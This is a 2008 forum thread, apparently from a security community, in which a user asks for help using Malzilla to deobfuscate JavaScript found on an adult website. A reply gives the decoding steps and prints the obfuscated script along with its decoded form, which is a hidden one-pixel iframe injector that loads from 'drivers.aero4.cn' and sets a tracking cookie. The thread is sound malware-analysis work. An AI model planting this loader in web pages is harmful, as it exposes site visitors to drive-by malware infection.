Author Topic: decoding scripts in malzilla  (Read 6315 times)

0 Members and 1 Guest are viewing this topic.

February 08, 2008, 11:08:26 pm
Read 6315 times

julevine

  • Special Access
  • Jr. Member

  • Offline
  • *

  • 14
I need help decoding this double script from freepornfotos.com

I am using malzilla but dont know how to decode the scripts

Code: [Select]
document.write(unescape("%3Cscript%3Eif%28yX%21%3D1%29%7Bfunction%20Gt%28Pl%29%7Breturn%20Pl%7Dtry%7Bvar%20AXa%3D%2788v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS%27%2C%20fVI%3DGt%28%27v%27%29%3B%20var%20DOj%3DArray%2825969%5E26005%2CkJM%28%27171%27%29%2C22080%5E22267%2CkJM%28%27170%27%29%2C29706%5E29883%2C4571%5E4467%2C23665%5E23773%2CkJM%28%27230%27%29%2CkJM%28%27213%27%29%2C26221%5E26303%2CkJM%28%27190%27%29%2C6158%5E6307%2C17023%5E17097%2CkJM%28%27183%27%29%2CkJM%28%27248%27%29%2CkJM%28%27145%27%29%2CkJM%28%27158%27%29%2C1294%5E1463%2C6482%5E6631%2CkJM%28%27189%27%29%2C6799%5E6783%2CkJM%28%27241%27%29%2CkJM%28%27163%27%29%2C5448%5E5613%2CkJM%28%27246%27%29%2C32698%5E32539%2CkJM%28%27229%27%29%2CkJM%28%27209%27%29%2C1769%5E1625%2C10271%5E10493%2CkJM%28%27255%27%29%2CkJM%28%27188%27%29%2CkJM%28%27174%27%29%2CkJM%28%27236%27%29%2C15549%5E15433%2CkJM%28%27247%27%29%2C28161%5E28321%2CkJM%28%27224%27%29%2CkJM%28%27238%27%29%2C26220%5E26335%2CkJM%28%27150%27%29%2CkJM%28%27142%27%29%2CkJM%28%27180%27%29%2C27394%5E27627%2C13100%5E13239%2C17404%5E17235%2CkJM%28%27156%27%29%2CkJM%28%27227%27%29%2C351%5E467%2C8512%5E8703%2C32450%5E32305%2CkJM%28%27232%27%29%2CkJM%28%27250%27%29%2C19346%5E19213%2CkJM%28%27149%27%29%2C5786%5E5649%2CkJM%28%27249%27%29%2C20719%5E20597%2CkJM%28%27141%27%29%2C27205%5E27343%2C23843%5E23991%2CkJM%28%27186%27%29%2CkJM%28%27164%27%29%2C1294%5E1513%2CkJM%28%27131%27%29%2CkJM%28%27134%27%29%2C11816%5E11997%2C32299%5E32393%2C13530%5E13371%2CkJM%28%27133%27%29%2C3077%5E3201%2CkJM%28%27151%27%29%2C11483%5E11313%2CkJM%28%27235%27%29%2C27176%5E27333%2C6220%5E6307%2CkJM%28%27242%27%29%29%2C%20pCw%3B%20var%20vOu%2C%20hDk%3B%20var%20MdE%3D%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%27%2C%20pLG%3D%27%27%3Bfunction%20kJM%28tzZ%29%7Breturn%20parseInt%28tzZ%29%7DAXa%3DAXa.split%28fVI%29%3Bfor%20%28pCw%3D0%3BpCw%3CMdE.length%3BpCw+%3D2%29%7BhDk%3DMdE.substr%28pCw%2C2%29%3Bvar%20HW%3DAXa.length%3Bfor%28vOu%3D0%3BvOu%3CHW%3BvOu++%29%20%7Bif%281%3D%3D0%29%3Bif%28AXa%5BvOu%5D%3D%3DhDk%29break%3B%7DpLG+%3DString.fromCharCode%28DOj%5BvOu%5D%5E216%29%3B%20%7Ddocument.write%28pLG%29%3B%7Dcatch%28Uy%29%7B%7D%7Dvar%20yX%3D1%3C/script%3E"))
 



thank you

February 08, 2008, 11:37:05 pm
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
After you let MalZilla decode that script you get this:
Code: [Select]
<script>if(yX!=1){function Gt(Pl){return Pl}try{var AXa='88v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS', fVI=Gt('v'); var DOj=Array(25969^26005,kJM('171'),22080^22267,kJM('170'),29706^29883,4571^4467,23665^23773,kJM('230'),kJM('213'),26221^26303,kJM('190'),6158^6307,17023^17097,kJM('183'),kJM('248'),kJM('145'),kJM('158'),1294^1463,6482^6631,kJM('189'),6799^6783,kJM('241'),kJM('163'),5448^5613,kJM('246'),32698^32539,kJM('229'),kJM('209'),1769^1625,10271^10493,kJM('255'),kJM('188'),kJM('174'),kJM('236'),15549^15433,kJM('247'),28161^28321,kJM('224'),kJM('238'),26220^26335,kJM('150'),kJM('142'),kJM('180'),27394^27627,13100^13239,17404^17235,kJM('156'),kJM('227'),351^467,8512^8703,32450^32305,kJM('232'),kJM('250'),19346^19213,kJM('149'),5786^5649,kJM('249'),20719^20597,kJM('141'),27205^27343,23843^23991,kJM('186'),kJM('164'),1294^1513,kJM('131'),kJM('134'),11816^11997,32299^32393,13530^13371,kJM('133'),3077^3201,kJM('151'),11483^11313,kJM('235'),27176^27333,6220^6307,kJM('242')), pCw; var vOu, hDk; var MdE='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', pLG='';function kJM(tzZ){return parseInt(tzZ)}AXa=AXa.split(fVI);for (pCw=0;pCw<MdE.length;pCw+=2){hDk=MdE.substr(pCw,2);var HW=AXa.length;for(vOu=0;vOu<HW;vOu++) {if(1==0);if(AXa[vOu]==hDk)break;}pLG+=String.fromCharCode(DOj[vOu]^216); }document.write(pLG);}catch(Uy){}}var yX=1</script>
 

Remove the script tags from the beginning and end. Then remove "if(yX!=1){" and "try{" and also remove "}catch(Uy){}}var yX=1" from the end.

You can then decode it in MalZilla and will be left with:

Code: [Select]
<script>
function IFrame(){}
IFrame.prototype = {

host : 'drivers.aero4.cn',
path : '/x86/',
cookieName : 'rd4va',
cookieValue : 1,

setCookie : function(name, value)
{
var d= new Date(); d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
},
install : function()
{
if(!this.alreadyInstalled())
{
var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
try { document.write(s) }
catch(e){ document.write("<html><body>" + s + "</body></html>") }
this.setCookie(this.cookieName, this.cookieValue);
}
},
getFrameURL : function()
{
var dlh=document.location.host;
return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
},
alreadyInstalled : function()
{
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
},
getRandString : function()
{
var l=16, c= '0123456789abcdef', o='';
for (var i=0; i < l; i++)   
o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);

return o;
}
}
var o = new IFrame();
o.install();
</script>

February 09, 2008, 12:59:48 am
Reply #2

sowhat-x

  • Guest
Lol,JohnC...now that was fast! :)

Never really bothered myself getting into javascript,
just basic stuff that came up as a result out of daily needs...
so when bobby released Malzilla,I went...'wow - this really saves my butt (and time!)'  :D
To be honest,I wasn't even really appreciating js that much,what I was thinking was kind of...
''...oh well,in the final end,it's meant for guys dedicated strictly to professional web development,
they're the target group here..." - something which is quite a bit away beyond my personal interests...

Until one day,he-he....I came across this tool from OWASP,
a full-blown program completely written under js...and it certainly changed my mind for good:
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
It's completely irrelevant with casual web development and malware analysis also of course,
meant for penetration testing and such stuff...
But it's an excellent proof that even the supposedly 'simpler' scripting languages,
can be really powerful if you seriously dive into them...